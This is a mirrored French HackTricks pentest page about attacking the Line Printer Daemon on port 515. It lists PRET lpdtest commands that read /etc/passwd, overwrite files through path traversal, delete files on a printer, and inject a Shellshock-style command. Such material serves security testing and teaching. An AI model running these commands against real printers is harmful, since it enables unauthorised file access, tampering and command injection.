Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

3.8 KiB
Raw Blame History

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Le protocole Line Printer Daemon (LPD) a été initialement introduit dans Berkeley Unix dans les années 80 (plus tard spécifié par le RFC1179).
Le démon s'exécute sur le port 515/tcp et peut être accédé en utilisant la commande lpr. Pour imprimer, le client envoie un fichier de contrôle définissant le travail/nom d'utilisateur et un fichier de données contenant les données réelles à imprimer. Le type d'entrée du fichier de données peut être défini dans le fichier de contrôle en choisissant parmi divers formats de fichiers. Cependant, c'est à l'implémentation LPD de décider comment gérer réellement les données d'impression. Une implémentation LPD populaire pour les systèmes d'exploitation de type Unix est LPRng. LPD peut être utilisé comme vecteur pour déployer des travaux d'impression PostScript malveillants ou PJL.

Les outils lpdprint et lpdtest sont inclus dans PRET. Ils constituent un moyen minimaliste d'imprimer des données directement sur une imprimante compatible LPD ou de télécharger/supprimer des fichiers et plus encore :

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Si vous voulez en savoir plus sur le hacking des imprimantes, lisez cette page.

Shodan

  • port 515
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :